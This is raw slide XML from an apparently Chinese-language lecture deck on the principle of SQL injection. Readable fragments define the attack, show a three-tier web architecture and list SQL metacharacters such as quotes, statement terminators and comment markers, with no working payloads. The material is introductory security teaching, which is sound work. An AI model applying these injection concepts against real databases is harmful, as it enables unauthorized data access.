                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>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语句终结符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>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对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>而言为连接（合并）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>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注释（单行）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>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注释（单行）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>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注释（多行）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3546710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fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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028775" y="1242429"/>
            <a:ext cx="11305256" cy="1010549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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注入是一种将</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代码插入或添加到应用（用户）的输入参数中的攻击，之后再将这些参数传递给后台</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服务器加以解析并执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="663997"/>
            <a:ext cx="2231857" cy="508862"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2231857" cy="508862"/>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2568651" y="828281"/>
              <a:ext cx="508861" cy="1657762"/>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2053958" y="1402731"/>
              <a:ext cx="1598005"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注入原理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3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23" name="insert-table_64301">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DDC27AF-CEF9-4AEA-8401-5F19406780A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746845" y="714116"/>
            <a:ext cx="378654" cy="379982"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2764 w 5941"/>
              <a:gd name="T1" fmla="*/ 0 h 5971"/>
              <a:gd name="T2" fmla="*/ 2560 w 5941"/>
              <a:gd name="T3" fmla="*/ 1500 h 5971"/>
              <a:gd name="T4" fmla="*/ 0 w 5941"/>
              <a:gd name="T5" fmla="*/ 1735 h 5971"/>
              <a:gd name="T6" fmla="*/ 234 w 5941"/>
              <a:gd name="T7" fmla="*/ 5971 h 5971"/>
              <a:gd name="T8" fmla="*/ 4471 w 5941"/>
              <a:gd name="T9" fmla="*/ 5736 h 5971"/>
              <a:gd name="T10" fmla="*/ 5737 w 5941"/>
              <a:gd name="T11" fmla="*/ 3269 h 5971"/>
              <a:gd name="T12" fmla="*/ 5941 w 5941"/>
              <a:gd name="T13" fmla="*/ 203 h 5971"/>
              <a:gd name="T14" fmla="*/ 2967 w 5941"/>
              <a:gd name="T15" fmla="*/ 408 h 5971"/>
              <a:gd name="T16" fmla="*/ 4036 w 5941"/>
              <a:gd name="T17" fmla="*/ 956 h 5971"/>
              <a:gd name="T18" fmla="*/ 2967 w 5941"/>
              <a:gd name="T19" fmla="*/ 408 h 5971"/>
              <a:gd name="T20" fmla="*/ 4036 w 5941"/>
              <a:gd name="T21" fmla="*/ 1359 h 5971"/>
              <a:gd name="T22" fmla="*/ 2967 w 5941"/>
              <a:gd name="T23" fmla="*/ 1907 h 5971"/>
              <a:gd name="T24" fmla="*/ 2967 w 5941"/>
              <a:gd name="T25" fmla="*/ 2314 h 5971"/>
              <a:gd name="T26" fmla="*/ 4036 w 5941"/>
              <a:gd name="T27" fmla="*/ 2862 h 5971"/>
              <a:gd name="T28" fmla="*/ 2967 w 5941"/>
              <a:gd name="T29" fmla="*/ 2314 h 5971"/>
              <a:gd name="T30" fmla="*/ 469 w 5941"/>
              <a:gd name="T31" fmla="*/ 5502 h 5971"/>
              <a:gd name="T32" fmla="*/ 2560 w 5941"/>
              <a:gd name="T33" fmla="*/ 1969 h 5971"/>
              <a:gd name="T34" fmla="*/ 1912 w 5941"/>
              <a:gd name="T35" fmla="*/ 3654 h 5971"/>
              <a:gd name="T36" fmla="*/ 1563 w 5941"/>
              <a:gd name="T37" fmla="*/ 3376 h 5971"/>
              <a:gd name="T38" fmla="*/ 1152 w 5941"/>
              <a:gd name="T39" fmla="*/ 4717 h 5971"/>
              <a:gd name="T40" fmla="*/ 1249 w 5941"/>
              <a:gd name="T41" fmla="*/ 4843 h 5971"/>
              <a:gd name="T42" fmla="*/ 2544 w 5941"/>
              <a:gd name="T43" fmla="*/ 4499 h 5971"/>
              <a:gd name="T44" fmla="*/ 2589 w 5941"/>
              <a:gd name="T45" fmla="*/ 4332 h 5971"/>
              <a:gd name="T46" fmla="*/ 3148 w 5941"/>
              <a:gd name="T47" fmla="*/ 3269 h 5971"/>
              <a:gd name="T48" fmla="*/ 4002 w 5941"/>
              <a:gd name="T49" fmla="*/ 5502 h 5971"/>
              <a:gd name="T50" fmla="*/ 4465 w 5941"/>
              <a:gd name="T51" fmla="*/ 2862 h 5971"/>
              <a:gd name="T52" fmla="*/ 5534 w 5941"/>
              <a:gd name="T53" fmla="*/ 2314 h 5971"/>
              <a:gd name="T54" fmla="*/ 5534 w 5941"/>
              <a:gd name="T55" fmla="*/ 1907 h 5971"/>
              <a:gd name="T56" fmla="*/ 4465 w 5941"/>
              <a:gd name="T57" fmla="*/ 1359 h 5971"/>
              <a:gd name="T58" fmla="*/ 5534 w 5941"/>
              <a:gd name="T59" fmla="*/ 1907 h 5971"/>
              <a:gd name="T60" fmla="*/ 4465 w 5941"/>
              <a:gd name="T61" fmla="*/ 956 h 5971"/>
              <a:gd name="T62" fmla="*/ 5534 w 5941"/>
              <a:gd name="T63" fmla="*/ 408 h 5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41" h="5971">
                <a:moveTo>
                  <a:pt x="5737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2764" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2652" y="0"/>
                  <a:pt x="2560" y="91"/>
                  <a:pt x="2560" y="203"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2560" y="1500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="1500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="1500"/>
                  <a:pt x="0" y="1605"/>
                  <a:pt x="0" y="1735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5736"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5866"/>
                  <a:pt x="105" y="5971"/>
                  <a:pt x="234" y="5971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4236" y="5971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4366" y="5971"/>
                  <a:pt x="4471" y="5866"/>
                  <a:pt x="4471" y="5736"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4471" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737" y="3269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5849" y="3269"/>
                  <a:pt x="5941" y="3177"/>
                  <a:pt x="5941" y="3065"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5941" y="203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5941" y="91"/>
                  <a:pt x="5849" y="0"/>
                  <a:pt x="5737" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="408"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="408"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="1359"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="2314"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2314"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4002" y="5502"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="469" y="5502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="3006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912" y="3654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="3402"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1634" y="3377"/>
                  <a:pt x="1597" y="3367"/>
                  <a:pt x="1563" y="3376"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1528" y="3385"/>
                  <a:pt x="1501" y="3412"/>
                  <a:pt x="1492" y="3447"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1152" y="4717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143" y="4751"/>
                  <a:pt x="1152" y="4788"/>
                  <a:pt x="1178" y="4813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1197" y="4833"/>
                  <a:pt x="1222" y="4843"/>
                  <a:pt x="1249" y="4843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1257" y="4843"/>
                  <a:pt x="1266" y="4842"/>
                  <a:pt x="1275" y="4839"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2544" y="4499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2579" y="4490"/>
                  <a:pt x="2606" y="4463"/>
                  <a:pt x="2615" y="4428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2624" y="4394"/>
                  <a:pt x="2614" y="4357"/>
                  <a:pt x="2589" y="4332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2337" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="5502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="2862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2862"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="1907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1907"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="956"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6812EEC0-D263-421C-BADB-E6F10B7A10BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3746790" y="2342047"/>
            <a:ext cx="7024254" cy="822761"/>
            <a:chOff x="3746790" y="2254880"/>
            <a:chExt cx="7024254" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476145B7-D4B3-4214-A839-3A97B0F7AFBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="2465613"/>
              <a:ext cx="52220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en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Web</a:t>
              </a:r>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浏览器或呈现引擎</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN"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29" name="直接连接符 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D2B4332-A852-4707-8F4C-CBD38990554D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="266626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860167E6-3D59-4C52-BB07-609F2277A148}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3746790" y="2254880"/>
              <a:ext cx="963155" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="963155" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="六边形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D8EE82-6B4B-49B0-AE64-9474F808C964}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="2676317"/>
                <a:ext cx="954108" cy="822761"/>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6D5F2944-CD71-419D-9E97-1231EBAC2337}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2366496" y="2887049"/>
                <a:ext cx="954108" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <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rPr>
                  <a:t>表示层</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3767D8D2-E663-4B64-A7B0-F4E9555ED782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3740871" y="3340338"/>
            <a:ext cx="7030173" cy="822761"/>
            <a:chOff x="3740871" y="3253171"/>
            <a:chExt cx="7030173" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A569E415-834D-4445-A608-41B9B1972FC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="3463311"/>
              <a:ext cx="52220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如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>C#</a:t>
              </a:r>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ASP</a:t>
              </a:r>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>.NET</a:t>
              </a:r>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>PHP</a:t>
              </a:r>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>JSP</a:t>
              </a:r>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等编程语言</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN"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40" name="直接连接符 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A07D02FA-C8C9-4A4E-A4C2-B6FFBE975536}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="3663959"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2476601-F95D-4E34-8FFC-59EAFB1BD93A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3740871" y="3253171"/>
              <a:ext cx="960027" cy="822761"/>
              <a:chOff x="2351530" y="4572440"/>
              <a:chExt cx="960027" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="六边形 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C381EA-D2D1-4427-ABE3-1105DAF9113B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="4572440"/>
                <a:ext cx="954108" cy="822761"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="矩形 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4BF2E1-EB5A-4A60-929C-A0CD1337D8A1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2351530" y="4782580"/>
                <a:ext cx="954108" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <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rPr>
                  <a:t>逻辑层</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="组合 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239BB2AE-4DF9-47CC-8B4B-3ACAF2D690E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3746790" y="4373790"/>
            <a:ext cx="8134805" cy="822761"/>
            <a:chOff x="3746790" y="4286623"/>
            <a:chExt cx="8134805" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078ED97D-6D56-4D55-9372-ED03B21775D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="4497356"/>
              <a:ext cx="63326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如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Microsoft SQL Server</a:t>
              </a:r>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>MySQL</a:t>
